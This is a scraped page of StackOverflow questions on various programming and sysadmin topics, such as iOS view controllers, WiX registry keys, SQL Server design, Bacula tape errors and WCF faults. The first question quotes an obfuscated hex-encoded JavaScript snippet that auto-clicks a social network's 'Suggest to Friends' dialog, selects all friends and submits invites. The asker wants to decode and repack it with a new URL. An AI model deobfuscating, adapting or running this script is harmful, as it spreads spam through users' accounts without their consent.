Hello stackoverflow! I have a javascript code that appears to be encrypted: javascript:var _0xe788=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x62\x6F\x64\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x36\x38\x37\x38\x34\x39\x34\x39\x39\x32\x36\x35\x37\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x77\x69\x64\x74\x68\x3A\x20\x38\x32\x30\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x36\x30\x30\x70\x78\x3B\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x30\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E"];var variables=[_0xe788[0],_0xe788[1],_0xe788[2],_0xe788[3],_0xe788[4],_0xe788[5],_0xe788[6],_0xe788[7],_0xe788[8],_0xe788[9],_0xe788[10],_0xe788[11],_0xe788[12],_0xe788[13]]; void (document[variables[2]](variables[1])[variables[0]]=variables[3]);var ss=document[variables[2]](variables[4]);var c=document[variables[6]](variables[5]);c[variables[8]](variables[7],true,true); void ss[variables[9]](c); void setTimeout(function (){fs[variables[10]]();} ,4000); void setTimeout(function (){SocialGraphManager[variables[13]](variables[11],variables[12]);} ,5000); void (document[variables[2]](variables[1])[variables[0]]=_0xe788[14]); I have seen similar instances and I have heard it may be Hex. I have been doing some google research and have found some online deciphers for Hex yet they all seem to struggle decrypting the code. I basically need to decipher this code, change some variables and repack it exactly how I found it but replacing a URL. How can I go about this? Are there any free online tools available? Many thanks.

Read the article

how to pass a string value from one controller to another

- by shreedevi

I have a login controller ,and after the successful login i want to pass some string value to the menu page.however it does not work.the application crashes. I have tried possible suggesstion of Ihuk and SAM from the link below http://stackoverflow.com/questions/1685964/how-to-pass-a-string-value-from-one-view-controller-to-another-view-controller loginController.h: #import <UIKit/UIKit.h> @class RootViewController; @class Menu; @interface LoginController : UIViewController { UIButton *login_Button; UITextField *username_TextField; UITextField *password_TextField; RootViewController *mc1; UINavigationController *navigationController; Menu *mv1; } @property(nonatomic,retain) IBOutlet UIButton *login_Button; @property(nonatomic,retain) IBOutlet UITextField *username_TextField; @property(nonatomic,retain) IBOutlet UITextField *password_TextField; @property(nonatomic,retain) RootViewController *mc1; @property (nonatomic, retain) IBOutlet UINavigationController *navigationController; @property(nonatomic,retain)Menu *mv1; - (IBAction)Login_Method:(id)sender; -(id)initWithUserName:(NSString *)name ; @end loginController.m #import "LoginController.h" #import "Menu.h" #import "ViewController.h" #import "RootViewController.h" @implementation LoginController @synthesize mc1,mv1; @synthesize login_Button,username_TextField,password_TextField; @synthesize navigationController; // Implement viewDidLoad to do additional setup after // loading the view, typically from a nib. - (void)viewDidLoad { if (![self.navigationController isNavigationBarHidden]) [self.navigationController setNavigationBarHidden:YES animated:NO]; //[self presentModalViewController:navigationController animated:YES]; } - (void)didReceiveMemoryWarning { // Releases the view if it doesn't have a superview. [super didReceiveMemoryWarning]; // Release any cached data, images, etc that aren't in use. } - (void)viewDidUnload { // Release any retained subviews of the main view. // e.g. self.myOutlet = nil; } - (IBAction)Login_Method:(id)sender { Menu *mv2 = [[Menu alloc] initWithUserName:@"Menu" bundle:nil]; //mv2.l1.text=@"aa"; //i tried this, but not work,so created initWithUserName self.mv1=mv2; [self presentModalViewController:mv1 animated:YES]; // [RootViewController release]; } -(id)initWithUserName:(NSString *)name { self = [super init]; if (nil == self) { return nil; } // display or store login info somewhere [mv1.l1 setText:name]; return self; } -(BOOL)textFieldShouldReturn:(UITextField *)theTextField { [theTextField resignFirstResponder]; return YES; } - (void)dealloc { [username_TextField release]; [password_TextField release]; [super dealloc]; } @end Menu.h #import <UIKit/UIKit.h> @class Menu; @interface Menu : UIViewController { UILabel *l1; UIButton *AccountSummary_Button; UIButton *PayOffQuote_Button; UIButton *PayBill_Button; UIButton *Logout_Button; UINavigationController *nv1; } @property(nonatomic,retain) IBOutlet UILabel *l1; @property(nonatomic,retain) IBOutlet UIButton *AccountSummary_Button; @property(nonatomic,retain) IBOutlet UIButton *PayOffQuote_Button; @property(nonatomic,retain) IBOutlet UIButton *PayBill_Button; @property(nonatomic,retain) IBOutlet UIButton *Logout_Button; @property (nonatomic, retain) IBOutlet UINavigationController *nv1; -(IBAction)ViewAccountSummary_method:(id)sender; -(IBAction)ViewPayOffQuote_method:(id)sender; -(IBAction)ViewPayBill_method:(id)sender; -(IBAction)Logout_method:(id)sender; @end Menu.m

Read the article

Image animation problem in silverlight

- by Jak

Hi followed " http://www.switchonthecode.com/tutorials/silverlight-3-tutorial-planeprojection-and-perspective-3d#comment-4688 ".. the animation is working fine. I am new to silver light. when i use dynamic image from xml instead of static image as in tutorial,.. it is not working fine, please help me on this. i used list box.. for this animation effect do i need to change listbox to some other arrangement ? if your answer yes means, pls give me some sample code. Thanks in advance. Xaml code: <ListBox Name="listBox1"> <ListBox.ItemTemplate> <DataTemplate> <StackPanel> <Image Source="{Binding imgurl}" HorizontalAlignment="Left" Name="image1" Stretch="Fill" VerticalAlignment="Top" MouseLeftButtonUp="FlipImage" /> </StackPanel> </DataTemplate> </ListBox.ItemTemplate> </ListBox> My C# code: //getting image URL from xml XElement xmlads = XElement.Parse(e.Result); //i bind the url in to listBox listBox1.ItemsSource = from ads in xmlads.Descendants("ad") select new zestItem { imgurl = ads.Element("picture").Value }; public class zestItem { public string imgurl { get; set; } } private int _zIndex = 10; private void FlipImage(object sender, MouseButtonEventArgs e) { Image image = sender as Image; // Make sure the image is on top of all other images. image.SetValue(Canvas.ZIndexProperty, _zIndex++); // Create the storyboard. Storyboard flip = new Storyboard(); // Create animation and set the duration to 1 second. DoubleAnimation animation = new DoubleAnimation() { Duration = new TimeSpan(0, 0, 1) }; // Add the animation to the storyboard. flip.Children.Add(animation); // Create a projection for the image if it doesn't have one. if (image.Projection == null) { // Set the center of rotation to -0.01, which will put a little space // between the images when they're flipped. image.Projection = new PlaneProjection() { CenterOfRotationX = -0.01 }; } PlaneProjection projection = image.Projection as PlaneProjection; // Set the from and to properties based on the current flip direction of // the image. if (projection.RotationY == 0) { animation.To = 180; } else { animation.From = 180; animation.To = 0; } // Tell the animation to animation the image's PlaneProjection object. Storyboard.SetTarget(animation, projection); // Tell the animation to animation the RotationYProperty. Storyboard.SetTargetProperty(animation, new PropertyPath(PlaneProjection.RotationYProperty)); flip.Begin(); }

Read the article

One registry key for many products not deleted on uninstall

- by NC1

My company has many products, we want to create a registry key Software\$(var.Manufacturer)that will have all of our products if our customers have installed more than one (which is likely) I then want to have a secondary key for each of our products which get removed on uninstall but the main one does not. I have tried to achieve this like below but my main key gets deleted so all of my other products also get deleted from the registry. I know this is trivial but I cannot find an answer. <DirectoryRef Id="TARGETDIR"> <Component Id="Registry" Guid="*" MultiInstance="yes" Permanent="yes"> <RegistryKey Root="HKLM" Key="Software\$(var.Manufacturer)" ForceCreateOnInstall="yes"> <RegistryValue Type="string" Name="Default" Value="true" KeyPath="yes"/> </RegistryKey> </Component> </DirectoryRef> <DirectoryRef Id="TARGETDIR"> <Component Id="RegistryEntries" Guid="*" MultiInstance="yes" > <RegistryKey Root="HKLM" Key="Software\$(var.Manufacturer)\[PRODUCTNAME]" Action="createAndRemoveOnUninstall"> <RegistryValue Type="string" Name="Installed" Value="true" KeyPath="yes"/> <RegistryValue Type="string" Name="ProductName" Value="[PRODUCTNAME]"/> </RegistryKey> </Component> </DirectoryRef> EDIT: I have got my registry keys to stay using the following code. However they only all delete wen all products are deleted, not one by one as they need to. <DirectoryRef Id="TARGETDIR"> <Component Id="Registry" Guid="FF75CA48-27DE-430E-B78F-A1DC9468D699" Permanent="yes" Shared="yes" Win64="$(var.Win64)"> <RegistryKey Root="HKLM" Key="Software\$(var.Manufacturer)" ForceCreateOnInstall="yes"> <RegistryValue Type="string" Name="Default" Value="true" KeyPath="yes"/> </RegistryKey> </Component> </DirectoryRef> <DirectoryRef Id="TARGETDIR"> <Component Id="RegistryEntries" Guid="D94FA576-970F-4503-B6C6-BA6FBEF8A60A" Win64="$(var.Win64)" > <RegistryKey Root="HKLM" Key="Software\$(var.Manufacturer)\[PRODUCTNAME]" ForceDeleteOnUninstall="yes"> <RegistryValue Type="string" Name="Installed" Value="true" KeyPath="yes"/> <RegistryValue Type="string" Name="ProductName" Value="[PRODUCTNAME]"/> </RegistryKey> </Component> </DirectoryRef>

Read the article

SQL Server architecture guidance

- by Liam

Hi, We are designing a new version of our existing product on a new schema. Its an internal web application with possibly 100 concurrent users (max)This will run on a SQL Server 2008 database. On of the discussion items recently is whether we should have a single database of split the database for performance reasons across 2 separate databases. The database could grow anywhere from 50-100GB over 5 years. We are Developers and not DBAs so it would be nice to get some general guidance. [I know the answer is not simple as it depends on the schema, archiving policy, amount of data etc. ] Option 1 Single Main Database [This is my preferred option]. The plan would be to have all the tables in a single database and possibly to use file groups and partitioning to separate the data if required across multiple disks. [Use schema if appropriate]. This should deal with the performance concerns One of the comments wrt this was that the a single server instance would still be processing this data so there would still be a processing bottle neck. For reporting we could have a separate reporting DB but this is still being discussed. Option 2 Split the database into 2 separate databases DB1 - Customers, Accounts, Customer resources etc DB2 - This would contain the bulk of the data [i.e. Vehicle tracking data, financial transaction tables etc]. These tables would typically contain a lot of data. [It could reside on a separate server if required] This plan would involve keeping the main data in a smaller database [DB1] and retaining the [mainly] read only transaction type data in a separate DB [DB2]. The UI would mainly read from DB1 and thus be more responsive. [I'm aware that this option makes it harder for Referential Integrity to be enforced.] Points for consideration As we are at the design stage we can at least make proper use of indexes to deal performance issues so thats why option 1 to me is attractive and its more of a standard approach. For both options we are considering implementing an archiving database. Apologies for the long Question. In summary the question is 1 DB or 2? Thanks in advance, Liam

Read the article

Saving JQuery Draggable Sitemap Values Correctly

- by mdolon

I am trying to implement Boagworld's Sitemap tutorial, however I am running into difficulty trying to correctly save the child/parent relationships. The HTML is as follows, however populated with other items as well: <input type="hidden" name="sitemap-order" id="sitemap-order" value="" /> <ul id=”sitemap”> <li id="1"> <dl> <dt><a href=”#”>expand/collapse</a> <a href=”#”>Page Title</a></dt> <dd>Text Page</dd> <dd>Published</dd> <dd><a href=”#”>delete</a></dd> </dl> <ul><!–child pages–></ul> </li> </ul> And here is the JQuery code: $('#sitemap li').prepend('<div class="dropzone"></div>'); $('#sitemap li').draggable({ handle: ' > dl', opacity: .8, addClasses: false, helper: 'clone', zIndex: 100 }); var order = ""; $('#sitemap dl, #sitemap .dropzone').droppable({ accept: '#sitemap li', tolerance: 'pointer', drop: function(e, ui) { var li = $(this).parent(); var child = !$(this).hasClass('dropzone'); //If this is our first child, we'll need a ul to drop into. if (child && li.children('ul').length == 0) { li.append('<ul/>'); } //ui.draggable is our reference to the item that's been dragged. if (child) { li.children('ul').append(ui.draggable); }else { li.before(ui.draggable); } //reset our background colours. li.find('dl,.dropzone').css({ backgroundColor: '', backgroundColor: '' }); li.find('.dropzone').css({ height: '8px', margin: '0' }); // THE PROBLEM: var parentid = $(this).parent().attr('id'); menuorder += ui.draggable.attr('id')+'=>'+parentid+','; $("#sitemap-order").val(order); }, over: function() { $(this).filter('dl').css({ backgroundColor: '#ccc' }); $(this).filter('.dropzone').css({ backgroundColor: '#aaa', height: '30px', margin: '5px 0'}); }, out: function() { $(this).filter('dl').css({ backgroundColor: '' }); $(this).filter('.dropzone').css({ backgroundColor: '', height: '8px', margin: '0' }); } }); When moving items into the top-level (without parents), the parentid value I get is of the first list item (the parent container), so I can never remove the parent value and have a top-level item. Is there a no-brainer answer that I'm just not seeing right now? Any help is appreciated.

Read the article

Having problems creating an array from XML data in Acrobat Javascript, please help if you can

- by Kevin Minke

I have a manually created array that already works example below: var PartsData = { 179: { ref:"", partNum: "201-2007-C00-00", descript: "System Monitor Card (Tracewell Only)", cage: "39764", qty: "1", SMR: "XBOZZ", UOC: "A" }}; Now this array above is is just one value in the array and it works fine. Here is the XML that I am trying to use to dynamically change the values. <?xml version="1.0" encoding="utf-8"?> <partsTables> <partsList> <part sheetNum="ta1"> <breakDownIndexNo>-1 </breakDownIndexNo> <referenceDesg/> <indent>20534220P01 </indent> <description/> <cage>TAC RI, GRADE-A SHOCK (TEC RACK), ALT P/N 72304-1</cage> <qtyPerAssy>23991 </qtyPerAssy> <smr>1 </smr> <uoc>ADODD </uoc> <blank/> </part> </partsList> </partsTables> I have this parsing just fine in Acrobat. Now I want to make the array work for me in using these values. if I have the following below it will work. Where part.item(i).indent.value equals the value of the indent node, etc. newArr = { 179: { ref: part.item(i).referenceDesg.value, partNum: part.item(i).indent.value, descript: part.item(i).cage.value, cage: part.item(i).qtyPerAssy.value, qty: part.item(i).smr.value, SMR: part.item(i).uoc.value, UOC: part.item(i).blank.value}}; As soon as I try to make the 179 value, which is in the breakDownIndexNo node, dynamic by using the direct part.item(i).breakDownIndexNo.value it will not compile. Acrobat is using javascript so I'm not sure why I can not get this to parse. I have tried to create a variable out of the breakDownIndexNo node and typed it to both a String and an Integer. this will let it create the array but it will not let me output from the array. newArr[indexNum].partNum gives me "no properties" where newArr[179].partNum if I were to manually set the index number to 179 will print out the value of part.item(i).indent.value. If any of you have an idea or an answer please let me know.

Read the article

Input/output (read) errors in Bacula while setting up a Tape Drive + Autochanger

- by Kyle Brandt

When running the label barcode command in bacula I am getting Input/output errors. I am just getting started in trying to set this up: Connecting to Storage daemon TapeDevice at ny-back01.ny.stackoverflow.com:9103 ... Sending label command for Volume "ACJ332" Slot 1 ... 3307 Issuing autochanger "unload slot 8, drive 0" command. 3304 Issuing autochanger "load slot 1, drive 0" command. 3305 Autochanger "load slot 1, drive 0", status is OK. block.c:1010 Read error on fd=5 at file:blk 0:0 on device "ULTRIUM-HH4" (/dev/st0). ERR=Input/output error. 3000 OK label. VolBytes=64512 DVD=0 Volume="ACJ332" Device="ULTRIUM-HH4" (/dev/st0) Catalog record for Volume "ACJ332", Slot 1 successfully created. Sending label command for Volume "ACJ331" Slot 2 ... 3307 Issuing autochanger "unload slot 1, drive 0" command. 3304 Issuing autochanger "load slot 2, drive 0" command. 3305 Autochanger "load slot 2, drive 0", status is OK. block.c:1010 Read error on fd=5 at file:blk 0:0 on device "ULTRIUM-HH4" (/dev/st0). ERR=Input/output error. 3000 OK label. VolBytes=64512 DVD=0 Volume="ACJ331" Device="ULTRIUM-HH4" (/dev/st0) Catalog record for Volume "ACJ331", Slot 2 successfully created. Sending label command for Volume "ACJ328" Slot 3 ... 3307 Issuing autochanger "unload slot 2, drive 0" command. 3304 Issuing autochanger "load slot 3, drive 0" command. 3305 Autochanger "load slot 3, drive 0", status is OK. block.c:1010 Read error on fd=5 at file:blk 0:0 on device "ULTRIUM-HH4" (/dev/st0). ERR=Input/output error. 3000 OK label. VolBytes=64512 DVD=0 Volume="ACJ328" Device="ULTRIUM-HH4" (/dev/st0) Catalog record for Volume "ACJ328", Slot 3 successfully created. Sending label command for Volume "ACJ329" Slot 4 ... 3307 Issuing autochanger "unload slot 3, drive 0" command. 3304 Issuing autochanger "load slot 4, drive 0" command. 3305 Autochanger "load slot 4, drive 0", status is OK. block.c:1010 Read error on fd=5 at file:blk 0:0 on device "ULTRIUM-HH4" (/dev/st0). ERR=Input/output error. 3000 OK label. VolBytes=64512 DVD=0 Volume="ACJ329" Device="ULTRIUM-HH4" (/dev/st0) Catalog record for Volume "ACJ329", Slot 4 successfully created. Sending label command for Volume "ACJ335" Slot 5 ... 3307 Issuing autochanger "unload slot 4, drive 0" command. 3304 Issuing autochanger "load slot 5, drive 0" command. 3305 Autochanger "load slot 5, drive 0", status is OK. block.c:1010 Read error on fd=5 at file:blk 0:0 on device "ULTRIUM-HH4" (/dev/st0). ERR=Input/output error. 3000 OK label. VolBytes=64512 DVD=0 Volume="ACJ335" Device="ULTRIUM-HH4" (/dev/st0) Catalog record for Volume "ACJ335", Slot 5 successfully created. Sending label command for Volume "ACJ334" Slot 6 ... 3307 Issuing autochanger "unload slot 5, drive 0" command. 3304 Issuing autochanger "load slot 6, drive 0" command. 3305 Autochanger "load slot 6, drive 0", status is OK. block.c:1010 Read error on fd=5 at file:blk 0:0 on device "ULTRIUM-HH4" (/dev/st0). ERR=Input/output error. 3000 OK label. VolBytes=64512 DVD=0 Volume="ACJ334" Device="ULTRIUM-HH4" (/dev/st0) Catalog record for Volume "ACJ334", Slot 6 successfully created. Sending label command for Volume "ACJ333" Slot 7 ... 3307 Issuing autochanger "unload slot 6, drive 0" command. 3304 Issuing autochanger "load slot 7, drive 0" command. 3305 Autochanger "load slot 7, drive 0", status is OK. block.c:1010 Read error on fd=5 at file:blk 0:0 on device "ULTRIUM-HH4" (/dev/st0). ERR=Input/output error. 3000 OK label. VolBytes=64512 DVD=0 Volume="ACJ333" Device="ULTRIUM-HH4" (/dev/st0) Catalog record for Volume "ACJ333", Slot 7 successfully created. Sending label command for Volume "ACJ330" Slot 8 ... 3307 Issuing autochanger "unload slot 7, drive 0" command. Bacula-dir: # Definition of file storage device Storage { Name = TapeDevice # Do not use "localhost" here Address = ny-back01.... # N.B. Use a fully qualified name here SDPort = 9103 Password = "..." Device = ULTRIUM-HH4 Media Type = LTO-4 Media Type = File Autochanger = Yes } Bacula-sd: Autochanger { Name = StorageLoader1U Device = ULTRIUM-HH4 Changer Command = "/etc/bacula/scripts/mtx-changer %c %o %S %a %d" Changer Device = /dev/sg5 } Device { Name = ULTRIUM-HH4 Media Type = LTO-4 Archive Device = /dev/st0 AutomaticMount = yes; AlwaysOpen = yes; RemovableMedia = yes; RandomAccess = no; AutoChanger = yes; RandomAccess = no; } Anyone knows what this means / why I am getting this?

Read the article

Web service client receiving generic FaultException rather than FaultException<T>

- by Junto

I am connecting to a Java Axis2 web service using a .NET web service client. The client itself targets the .NET 3.5 framework. The application that wraps the client DLL is 2.0. I'm not sure if that has any bearing. I have been given the WSDL and XSDs by email. From those I have built my proxy class using svcutil. Although I am able to successfully send messages, I am unable to pick up the correct faults when something goes wrong. In the example below, errors are always being picked up by the generic FaultException. catch (FaultException<InvoiceErrorType> fex) { OnLog(enLogLevel.ERROR, fex.Detail.ErrorDescription); } catch (FaultException gfex) { OnLog(enLogLevel.ERROR, gfex.Message); } The proxy client appears to have the appropriate attributes for the FaultContract: // CODEGEN: Generating message contract since the operation SendInvoiceProvider_Prod is neither RPC nor document wrapped. [OperationContractAttribute(Action = "https://private/SendInvoiceProvider", ReplyAction = "*")] [FaultContractAttribute(typeof(InvoiceErrorType), Action = "https://private/SendInvoiceProvider", Name = "InvoiceError", Namespace = "urn:company:schema:entities:base")] [XmlSerializerFormatAttribute(SupportFaults = true)] [ServiceKnownTypeAttribute(typeof(ItemDetail))] [ServiceKnownTypeAttribute(typeof(Supplier))] OutboundComponent.SendInvoiceProviderResponse SendInvoiceProvider_Prod(OutboundComponent.SendInvoiceProvider_Request request); I have enabled tracing and I can see the content of the fault coming back, but .NET is not recognizing it as an InvoiceError. The SOAP fault in full is: <soapenv:Fault> <faultcode xmlns="">soapenv:Client</faultcode> <faultstring xmlns="">Message found to be invalid</faultstring> <faultactor xmlns="">urn:SendInvoiceProvider</faultactor> <detail xmlns=""> <InvoiceError xmlns="urn:company:schema:entities:common:invoiceerror:v01"> <ErrorID>100040</ErrorID> <ErrorType>UNEXPECTED</ErrorType> <ErrorDescription><![CDATA[<error xmlns="urn:company:schema:errordetail:v01"><errorCode>1000</errorCode><highestSeverity>8</highestSeverity><errorDetails count="1"><errorDetail><errorType>1</errorType><errorSeverity>8</errorSeverity><errorDescription>cvc-complex-type.2.4.a: Invalid content was found starting with element 'CompanyName'. One of '{"urn:company:schema:sendinvoice:rq:v01":RoleType}' is expected.</errorDescription><errorNamespace>urn:company:schema:sendinvoice:rq:v01</errorNamespace><errorNode>CompanyName</errorNode><errorLine>1</errorLine><errorColumn>2556</errorColumn><errorXPath/><errorSource/></errorDetail></errorDetails></error>]]></ErrorDescription> <TimeStamp>2010-05-04T21:12:10Z</TimeStamp> </InvoiceError> </detail> </soapenv:Fault> I have noticed the namespace defined on the error: <InvoiceError xmlns="urn:company:schema:entities:common:invoiceerror:v01"> This is nowhere to be seen in the generated proxy class, nor in the WSDLs. The interface WSDL defines the error schema namespace as such: <xs:import namespace="urn:company:schema:entities:base" schemaLocation="InvoiceError.xsd"/> Could this be the reason why the .NET client is not able to parse the typed Fault Exception correctly? I have no control over the web service itself. I see no reason why .NET can't talk to a Java Axis2 web service. This user had a similar issue, but the reason for his problem cannot be the same as mine, since I can see the fault detail in the trace: http://stackoverflow.com/questions/864800/does-wcf-faultexceptiont-support-interop-with-a-java-web-service-fault Any help would be gratefully received.

Search Results

Search found 16643 results on 666 pages for 'stackoverflow answer'.

Page 633/666 | < Previous Page | 629 630 631 632 633 634 635 636 637 638 639 640 | Next Page >

- by Pandiya Chendur

- by Joshua

- by M. McKenzie

- by Anders Svensson

- by Globalkeith

- by Christian Varga

- by Akcire Atienza

- by Andreas Bonini

- by Neo

- by Ed

- by prosseek

- by eblume

- by Walter Nissen

- by Mawg

- by Kim Sun-wu

- by martona

- by DoMx

- by shreedevi

- by Jak

- by NC1

- by Liam

- by mdolon

- by Kevin Minke

- by Kyle Brandt

- by Junto

< Previous Page | 629 630 631 632 633 634 635 636 637 638 639 640 | Next Page >